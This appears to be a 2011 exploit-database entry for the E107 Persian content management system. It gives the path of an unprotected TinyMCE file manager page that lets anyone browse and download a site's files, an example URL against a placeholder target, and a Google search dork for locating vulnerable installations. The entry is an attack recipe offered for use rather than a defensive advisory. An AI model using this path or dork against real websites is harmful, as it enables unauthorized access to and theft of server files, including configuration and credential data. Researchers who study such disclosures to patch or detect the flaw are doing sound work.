E107 Persian Directory Traversal & Arbitrary File Download

2011-09-27T00:00:00
ID 1337DAY-ID-17191
Type zdt
Reporter St493r
Modified 2011-09-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Author   : St493r
[#] Contact  : [email protected]
[#] Title    : E107 Persian  Directory Traversal & Arbitrary File Download
[#] Vendor   : http://e107.com
[#] Software : http://e107.ir/files/downloads/e107_7.25_ir.zip
[#] Date     : 28 - 09 - 2011
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Vulnerability File : /handlers/tiny_mce/plugins/filemanager/pages/fm/index.html

Go to this above link ,
Example : http://TARGET/handlers/tiny_mce/plugins/filemanager/pages/fm/index.html
Now you can see all directories and files of target , also you can download
files from left menu , and more option that you can see them above 

Google dork : Powered By E107 Persian

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++						 
[#] Thanks To All Iranian Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



#  0day.today [2018-02-05]  #